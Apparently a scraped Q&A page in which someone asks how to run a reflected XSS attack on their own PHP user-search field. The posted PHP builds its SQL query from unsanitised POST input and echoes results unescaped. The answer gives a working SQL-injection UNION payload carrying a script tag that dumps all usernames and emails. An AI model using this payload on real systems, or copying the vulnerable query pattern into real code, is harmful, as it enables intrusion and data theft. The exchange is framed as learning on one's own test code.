Question

I have a php search field that searches for the users inside the database and outputs in in a table.

I wanted to learn how to perform a simple non-persistent XSS attack to the search field.

This is my php:

echo "List of user(s) found:<br><br>";

    $query = "select display_name, email from members where user_name='".$_POST['search_name']."';";

    $res = mysqli_query($Connect,$query);

    if (mysqli_num_rows($res) > 0 )
    {
     echo "<table border=1>";
     echo "<tr><th>Display Name</th><th>Email</th></tr>";
     while($row=mysqli_fetch_assoc($res))
     {
      echo "<tr><td>$row[display_name]</td><td>$row[email]</td></tr>";
     }
     echo "</table>";
    }
    else
    {
     echo "User not found!";
    }

I have tried sending through some background change syntax and alerts but none seem to work.

<div style="background:<?php echo $colour ?>;">
<script>alert(‘XSS injection’)</script>

Can someone explain to me how I would manage any sort of attack?

NB: I would like it to be a POST method and not GET

Thank you.

Answer 1

If you're just trying to understand how they work, then you could post something like this:

$_POST['search_name'] = "' OR 1=1 UNION SELECT '<script>alert(\"XSS Injection\");</script>', '";

That would allow you to inject XSS into the page, and get all usernames/emails.

e: The resulting query would look like this:

select display_name, email from members where user_name='' OR 1=1 UNION SELECT '<script>alert(\"XSS Injection\");</script>', '';

The result would look like this:

how to perform non-persistent XSS attach to a simple php search field

1 个答案: